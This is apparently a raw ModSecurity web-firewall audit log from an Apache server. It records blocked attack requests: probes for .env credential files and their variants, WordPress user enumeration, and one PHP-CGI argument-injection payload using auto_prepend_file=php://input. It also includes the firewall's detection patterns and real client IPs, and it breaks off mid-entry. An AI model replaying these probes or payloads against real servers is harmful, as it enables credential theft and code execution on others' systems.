X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; MI 8 Lite Build/PKQ1.181007.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/1409 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --2b47c26c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b47c26c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750029500716802 1038 (- - -) Stopwatch2: 1750029500716802 1038; combined=473, p1=438, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b47c26c-Z-- --5db5792c-A-- [16/Jun/2025:06:29:58 +0700] aE9Xdh9AUmrZE8TgO0VWdgAAAFQ 103.236.140.4 60370 103.236.140.4 8181 --5db5792c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.142.104.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.142.104.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5db5792c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5db5792c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750030198891669 2951 (- - -) Stopwatch2: 1750030198891669 2951; combined=1307, p1=468, p2=809, p3=0, p4=0, p5=29, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5db5792c-Z-- --9ef13b5b-A-- [16/Jun/2025:07:27:11 +0700] aE9k39PYN2mzu-AuhSOJdwAAABc 103.236.140.4 58580 103.236.140.4 8181 --9ef13b5b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.5.36.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.5.36.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9ef13b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ef13b5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750033631655100 3022 (- - -) Stopwatch2: 1750033631655100 3022; combined=1299, p1=430, p2=837, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ef13b5b-Z-- --2d6c0664-A-- [16/Jun/2025:09:16:20 +0700] aE9-dB9AUmrZE8TgO0WBEgAAAFQ 103.236.140.4 43554 103.236.140.4 8181 --2d6c0664-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 Accept-Charset: utf-8 --2d6c0664-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d6c0664-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750040180054214 833 (- - -) Stopwatch2: 1750040180054214 833; combined=396, p1=354, p2=0, p3=0, p4=0, p5=42, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d6c0664-Z-- --69985505-A-- [16/Jun/2025:09:23:21 +0700] aE-AGdPYN2mzu-AuhSOoHAAAABE 103.236.140.4 49842 103.236.140.4 8181 --69985505-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.4 Safari/537.36 Accept-Charset: utf-8 --69985505-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69985505-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750040601231280 914 (- - -) Stopwatch2: 1750040601231280 914; combined=398, p1=338, p2=0, p3=0, p4=0, p5=60, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69985505-Z-- --7621f07c-A-- [16/Jun/2025:09:31:04 +0700] aE-B6Gf-_Obc6SnO-jx3wQAAAJc 103.236.140.4 52752 103.236.140.4 8181 --7621f07c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.227.70.2 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --7621f07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7621f07c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750041064439404 864 (- - -) Stopwatch2: 1750041064439404 864; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7621f07c-Z-- --599e0e0e-A-- [16/Jun/2025:09:41:08 +0700] aE-ERC-4qihuRDlKQ4l4uQAAAMk 103.236.140.4 52812 103.236.140.4 8181 --599e0e0e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.135.45.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.135.45.32 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --599e0e0e-C-- --599e0e0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --599e0e0e-E-- --599e0e0e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750041668035756 4845 (- - -) Stopwatch2: 1750041668035756 4845; combined=3153, p1=510, p2=2603, p3=0, p4=0, p5=40, sr=86, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --599e0e0e-Z-- --dca9f025-A-- [16/Jun/2025:10:01:54 +0700] aE-JItPYN2mzu-AuhSOpDAAAABE 103.236.140.4 53016 103.236.140.4 8181 --dca9f025-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept-Charset: utf-8 --dca9f025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dca9f025-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750042914527189 886 (- - -) Stopwatch2: 1750042914527189 886; combined=350, p1=303, p2=0, p3=0, p4=0, p5=47, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dca9f025-Z-- --332e876f-A-- [16/Jun/2025:10:02:09 +0700] aE-JMdPYN2mzu-AuhSOpDQAAAAI 103.236.140.4 53018 103.236.140.4 8181 --332e876f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Accept-Charset: utf-8 --332e876f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --332e876f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750042929469093 806 (- - -) Stopwatch2: 1750042929469093 806; combined=342, p1=304, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --332e876f-Z-- --b3aba43e-A-- [16/Jun/2025:10:11:51 +0700] aE-Ld2f-_Obc6SnO-jx3zAAAAIc 103.236.140.4 53048 103.236.140.4 8181 --b3aba43e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --b3aba43e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3aba43e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043511225146 881 (- - -) Stopwatch2: 1750043511225146 881; combined=357, p1=318, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3aba43e-Z-- --05148b11-A-- [16/Jun/2025:10:11:51 +0700] aE-Ld9PYN2mzu-AuhSOpFQAAAAA 103.236.140.4 53050 103.236.140.4 8181 --05148b11-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --05148b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05148b11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043511462611 719 (- - -) Stopwatch2: 1750043511462611 719; combined=291, p1=254, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05148b11-Z-- --62035f44-A-- [16/Jun/2025:10:11:51 +0700] aE-Ld9PYN2mzu-AuhSOpFgAAAAM 103.236.140.4 53052 103.236.140.4 8181 --62035f44-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --62035f44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62035f44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043511801775 669 (- - -) Stopwatch2: 1750043511801775 669; combined=263, p1=229, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62035f44-Z-- --d73fea35-A-- [16/Jun/2025:10:11:52 +0700] aE-LeNPYN2mzu-AuhSOpFwAAABQ 103.236.140.4 53054 103.236.140.4 8181 --d73fea35-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --d73fea35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d73fea35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043512039005 674 (- - -) Stopwatch2: 1750043512039005 674; combined=259, p1=227, p2=0, p3=0, p4=0, p5=31, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d73fea35-Z-- --7d6ffc40-A-- [16/Jun/2025:10:11:52 +0700] aE-LeGf-_Obc6SnO-jx3zQAAAIo 103.236.140.4 53056 103.236.140.4 8181 --7d6ffc40-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7d6ffc40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d6ffc40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043512377910 747 (- - -) Stopwatch2: 1750043512377910 747; combined=318, p1=269, p2=0, p3=0, p4=0, p5=49, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d6ffc40-Z-- --1efa5573-A-- [16/Jun/2025:10:11:52 +0700] aE-LeNPYN2mzu-AuhSOpGAAAAAg 103.236.140.4 53058 103.236.140.4 8181 --1efa5573-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --1efa5573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1efa5573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043512615458 641 (- - -) Stopwatch2: 1750043512615458 641; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1efa5573-Z-- --c66b633d-A-- [16/Jun/2025:10:11:52 +0700] aE-LeNPYN2mzu-AuhSOpGQAAABY 103.236.140.4 53060 103.236.140.4 8181 --c66b633d-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --c66b633d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c66b633d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043512954195 716 (- - -) Stopwatch2: 1750043512954195 716; combined=324, p1=292, p2=0, p3=0, p4=0, p5=32, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c66b633d-Z-- --7285d11b-A-- [16/Jun/2025:10:11:53 +0700] aE-LedPYN2mzu-AuhSOpGgAAAAU 103.236.140.4 53062 103.236.140.4 8181 --7285d11b-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7285d11b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7285d11b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043513191591 623 (- - -) Stopwatch2: 1750043513191591 623; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7285d11b-Z-- --e3198d66-A-- [16/Jun/2025:10:11:53 +0700] aE-LeWf-_Obc6SnO-jx3zgAAAIU 103.236.140.4 53064 103.236.140.4 8181 --e3198d66-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --e3198d66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3198d66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 